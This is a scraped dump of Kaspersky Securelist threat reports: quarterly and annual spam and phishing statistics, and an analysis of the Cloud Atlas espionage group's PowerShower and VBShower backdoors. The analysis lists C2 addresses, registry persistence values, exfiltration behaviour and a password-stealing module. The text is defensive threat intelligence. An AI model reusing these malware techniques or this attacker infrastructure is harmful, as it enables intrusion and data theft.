([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim&#x27;s device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country&#x27;s share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories &quot;Social networks and blogs&quot; (6.24%) and &quot;IMs&quot; (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year&#x27;s resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the &quot;preview&quot;, the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims&#x27; personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the &quot;charity&quot; found the victim&#x27;s telephone number in a database of individuals affected by COVID-19. Those who wished to receive the &quot;aid&quot; were asked to state their full name, contact details, date of birth, social security and driver&#x27;s license numbers, gender, and current employer, attaching a scanned copy of their driver&#x27;s license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others&#x27; personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers&#x27; interest in wallet owners&#x27; accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user&#x27;s secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The &quot;giveaways&quot; were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the &quot;giveaways&quot;. Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that &quot;financial assistance&quot; is frequently promised by con artists to swindle you out of your money.\n\n&quot;Promotional campaigns by major banks&quot; were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims&#x27; vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar &quot;campaigns&quot; were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a &quot;Ramadan Relief&quot; program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization&#x27;s logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive &quot;recipient feedback&quot; posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the &quot;shipping costs&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n&quot;Insides&quot; about &quot;private sales&quot; were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user&#x27;s appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the &quot;update&quot;, the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users&#x27; risk of losing personal data was now higher, too. &quot;Well-wishers&quot; who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to &quot;test&quot; a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year&#x27;s celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children&#x27;s drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends&#x27; kids&#x27; works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years&#x27; competition pages, as requests to vote for one&#x27;s friends&#x27; kids are common before public holidays.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is &quot;Nigerian-type&quot; scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims&#x27; email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user&#x27;s email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on &quot;prizes&quot; or &quot;earning money&quot;, messages in other languages, in 